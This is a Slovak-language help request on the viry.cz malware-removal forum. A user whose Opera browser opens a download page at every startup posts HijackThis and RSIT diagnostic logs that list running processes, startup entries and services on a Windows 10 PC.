VIRY.CZ

Pomáháme v boji s počítačovou havěti!
https://forum.viry.cz:443/

Zapnutie prehliadača po spustení pc

https://forum.viry.cz:443/viewtopic.php?t=156349

Stránka 1 z 1

Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 18:50
od mifoIV
Dobrý deň. Chcel by som Vás poprosiť o kontrolu logu. Po zapnutí pc sa mi automaticky zapne opera a otvorí nové okno so stránkou kde núka niečo na stiahnutie. Ďakujem Vám.

Log musím rozdeliť do dvoch správ, nevôjde sa sem.

Logfile of random's system information tool 1.10 (written by random/random)
Run by mifoI at 2019-09-17 19:43:02
Microsoft Windows 10 Home
System drive C: has 139 GB (57%) free of 243 GB
Total RAM: 16288 MB (58% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:43:19, on 17. 9. 2019
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.17763.0592)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
D:\Hry\Lol\LeagueClient.exe
D:\Hry\Lol\LeagueClientUx.exe
D:\Hry\Lol\LeagueClientUxRender.exe
D:\Hry\Lol\LeagueClientUxRender.exe
C:\Program Files\trend micro\mifoI.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer17win10.msn.com/?pc=ACTE
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://securedsearch.lavasoft.com/?pr=v ... 54__190317
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssv.dll
O2 - BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2ssv.dll
O4 - HKLM\..\Run: [FxSound Enhancer] C:\Program Files (x86)\DFX\dfx.exe -startup
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [CCleaner Smart Cleaning] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'NETWORK SERVICE')
O4 - Global Startup: Java 32bit.bat
O8 - Extra context menu item: &Enviar para o OneNote - res://C:\PROGRA~1\MICROS~1\Office15\ONBttnIE.dll/105
O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office15\EXCEL.EXE/3000
O9 - Extra button: Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: &Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
O9 - Extra button: &Anotaçoes Vinculadas do OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: &Anotaçoes Vinculadas do OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://*.webcompanion.com
O18 - Protocol: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files (x86)\Microsoft Office\Office15\MSOSB.DLL
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
O23 - Service: Intel® SGX AESM (AESMService) - Intel Corporation - C:\WINDOWS\System32\DriverStore\FileRepository\sgx_psw.inf_amd64_1781f8bae8fdf5c0\aesm_service.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\aswidsagent.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Avast Firewall Service (avast! Firewall) - AVAST Software - C:\Program Files\AVAST Software\Avast\afwServ.exe
O23 - Service: AvastWscReporter - AVAST Software - C:\Program Files\AVAST Software\Avast\wsc_proxy.exe
O23 - Service: BattlEye Service (BEService) - Unknown owner - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Google Chrome Elevation Service (GoogleChromeElevationService) - Google LLC - C:\Program Files (x86)\Google\Chrome\Application\76.0.3809.132\elevation_service.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @oem13.inf,%iaStorAfsWindowsService.Name%;Intel(R) Optane(TM) Memory Service (iaStorAfsService) - Intel Corporation - C:\WINDOWS\IAStorAfsService\iaStorAfsService.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: @oem20.inf,%SERVICE_NAME%;Intel Bluetooth Service (ibtsiva) - Unknown owner - C:\WINDOWS\system32\ibtsiva (file missing)
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\SocketHeciServer.exe
O23 - Service: Intel(R) TPM Provisioning Service - Intel(R) Corporation - C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\TPMProvisioningService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Killer Network Service - Unknown owner - C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KillerNetworkService.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: Predator Service (PSSvc) - Acer Incorporated - C:\Program Files\Acer\PredatorSense Service\PSSvc.exe
O23 - Service: Quick Access Local Service (QALSvc) - Acer Incorporated - C:\Program Files\Acer\Acer Quick Access\QALSvc.exe
O23 - Service: Quick Access Service (QASvc) - Acer Incorporated - C:\Program Files\Acer\Acer Quick Access\QASvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: Realtek Audio Universal Service (RtkAudioUniversalService) - Unknown owner - C:\WINDOWS\System32\RtkAudUService64.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\WINDOWS\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\SgrmBroker.exe,-100 (SgrmBroker) - Unknown owner - C:\WINDOWS\system32\SgrmBroker.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\WINDOWS\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Thunderbolt(TM) Service (ThunderboltService) - Intel Corporation - C:\Program Files (x86)\Intel\Thunderbolt Software\tbtsvc.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: User Experience Improvement Program (UEIPSvc) - acer - C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: Waves Audio Services (WavesSysSvc) - Waves Audio Ltd. - C:\WINDOWS\System32\DriverStore\FileRepository\wavesapo.inf_amd64_1fb2e6862d041cad\WavesSysSvc64.exe
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Intel(R) Extreme Tuning Utility Service (XTU3SERVICE) - Intel(R) Corporation - C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\XtuService.exe

--
End of file - 12614 bytes

======Listing Processes======










winlogon.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
"fontdrvhost.exe"
"fontdrvhost.exe"
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
C:\WINDOWS\system32\svchost.exe -k RPCSS -p
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p -s LSM
"dwm.exe"
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s UserManager
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\WINDOWS\system32\svchost.exe -k LocalService -p
C:\WINDOWS\system32\svchost.exe -k appmodel -p -s camsvc
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s nsi
"C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain
C:\WINDOWS\System32\svchost.exe -k netsvcs -p -s Themes
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s EventSystem
C:\WINDOWS\system32\svchost.exe -k appmodel -p -s StateRepository

C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s SENS
C:\WINDOWS\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s FontCache
C:\WINDOWS\System32\svchost.exe -k LocalService -p -s netprofm
"C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -f "C:\ProgramData\NVIDIA\DisplaySessionContainer%d.log" -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\Session" -r -l 3 -p 30000 -c
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\AUDIODG.EXE 0x468
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\WINDOWS\system32\WLANExt.exe 2726778318128
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\WINDOWS\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
"C:\Program Files\AVAST Software\Avast\afwServ.exe"
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s WpnService
"C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe" -s NvContainerLocalSystem -f "C:\ProgramData\NVIDIA\NvContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem" -r -p 30000 -st "C:\Program Files\NVIDIA Corporation\NvContainer\NvContainerTelemetryApi.dll"

C:\WINDOWS\system32\ibtsiva
"C:\WINDOWS\System32\RtkAudUService64.exe"
C:\WINDOWS\System32\DriverStore\FileRepository\wavesapo.inf_amd64_1fb2e6862d041cad\WavesSysSvc64.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\WINDOWS\System32\svchost.exe -k utcsvc -p
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s SstpSvc
C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS
"C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\WINDOWS\System32\svchost.exe -k NetSvcs -p -s iphlpsvc
dashost.exe {c3918a08-99c7-4607-b91624867f88b5a7}
C:\WINDOWS\System32\svchost.exe -k LocalService -p -s WdiServiceHost
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KillerNetworkService.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs


C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\WINDOWS\system32\wbem\wmiprvse.exe
sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService
"ctfmon.exe"
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s CDPSvc
"C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe" -f "C:\ProgramData\NVIDIA\NvContainerUser%dSPUser.log" -d "C:\Program Files\NVIDIA Corporation\NvContainer\plugins\SPUser" -r -l 3 -p 30000 -st "C:\Program Files\NVIDIA Corporation\NvContainer\NvContainerTelemetryApi.dll" -c
"C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe" -f "C:\ProgramData\NVIDIA\NvContainerUser%d.log" -d "C:\Program Files\NVIDIA Corporation\NvContainer\plugins\User" -r -l 3 -p 30000 -st "C:\Program Files\NVIDIA Corporation\NvContainer\NvContainerTelemetryApi.dll" -c
C:\WINDOWS\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
"C:\Program Files\AVAST Software\Avast\aswEngSrv.exe" /pipename="EC0873A5-5FCC-7A32-FD55-C7D9EC06D30E" /binpath="C:\Program Files\AVAST Software\Avast"
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\WINDOWS\system32\SearchIndexer.exe /Embedding
C:\WINDOWS\system32\SettingSyncHost.exe -Embedding

C:\WINDOWS\system32\wbem\unsecapp.exe -Embedding
C:\WINDOWS\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
"C:\Program Files\WindowsApps\Microsoft.YourPhone_1.19082.1006.0_x64__8wekyb3d8bbwe\YourPhone.exe" -ServerName:App.AppX9yct9q388jvt4h7y0gn06smzkxcsnt8m.mca
C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup
C:\Windows\System32\RuntimeBroker.exe -Embedding
"C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe"
"C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe"
"C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe" --type=gpu-process --disable-features=AsyncWheelEvents,SurfaceSynchronization --no-sandbox --log-file="C:\Users\mifoI\AppData\Local\NVIDIA Corporation\NVIDIA Share\debug.log" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwCAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --log-file="C:\Users\mifoI\AppData\Local\NVIDIA Corporation\NVIDIA Share\debug.log" --lang=en-US --service-request-channel-token=52505C57C11D04518449C54C5C97C5CA --mojo-platform-channel-handle=1764 /prefetch:2
"C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19072.12011.0_x64__8wekyb3d8bbwe\Video.UI.exe" -ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca
"C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" index.js
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\RuntimeBroker.exe -Embedding
"C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe" --type=renderer --no-sandbox --disable-features=AsyncWheelEvents,SurfaceSynchronization --service-pipe-token=48AEF5879CB084D14E8FF63F081F8887 --lang=en-US --log-file="C:\Users\mifoI\AppData\Local\NVIDIA Corporation\NVIDIA Share\debug.log" --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=48AEF5879CB084D14E8FF63F081F8887 --renderer-client-id=3 --mojo-platform-channel-handle=2020 /prefetch:1
"C:\Windows\System32\SecurityHealthSystray.exe"
C:\Windows\System32\RuntimeBroker.exe -Embedding
"C:\Windows\System32\RtkAudUService64.exe" -background
"C:\Windows\System32\DriverStore\FileRepository\wavesapo.inf_amd64_1fb2e6862d041cad\WavesSvc64.exe" -Jack
AvastUI.exe /nogui
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe -Embedding
"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11909.1001.7.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s wuauserv
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
"C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19072.14111.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
"C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe"
C:\WINDOWS\System32\DriverStore\FileRepository\sgx_psw.inf_amd64_1781f8bae8fdf5c0\aesm_service.exe
"C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe"

C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c
"C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe"
"C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe"

C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s UsoSvc
"C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\XtuService.exe"
"C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
"C:\Program Files\Killer Networking\Killer Control Center\KillerControlCenter.exe" -minimized
"C:\Program Files (x86)\Steam\Steam.exe" -silent
"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=cs_CZ" "-cachedir=C:\Users\mifoI\AppData\Local\Steam\htmlcache" "-steampid=13452" "-buildid=1568566542" "-steamid=0" "-steamuniverse=Dev" "-clientui=C:\Program Files (x86)\Steam\clientui" --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --enable-media-stream --enable-smooth-scrolling --num-raster-threads=4 --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt"
"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" --type=crashpad-handler /prefetch:7 --max-uploads=5 --max-db-size=20 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files (x86)\Steam\dumps" "--metrics-dir=C:\Users\mifoI\AppData\Local\CEF\User Data" --url=http://crash.steampowered.com/submit --annotation=platform=win64 --annotation=product=cefwebhelper --annotation=version=1568566542 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2c0,0x2d0,0x7ffb715bf760,0x7ffb715bf770,0x7ffb715bf780
"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" --type=gpu-process --field-trial-handle=1340,17224370070923997330,15258235204943688626,131072 --log-file="C:\Program Files (x86)\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --lang=sk-SK --buildid=1568566542 --steamid=0 --gpu-preferences=KAAAAAAAAACAAwCAAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=7012280345705785396 --mojo-platform-channel-handle=1396 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --field-trial-handle=1340,17224370070923997330,15258235204943688626,131072 --service-pipe-token=17440184487831251467 --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --lang=sk --log-file="C:\Program Files (x86)\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --buildid=1568566542 --steamid=0 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=17440184487831251467 --renderer-client-id=4 --mojo-platform-channel-handle=2112 /prefetch:1
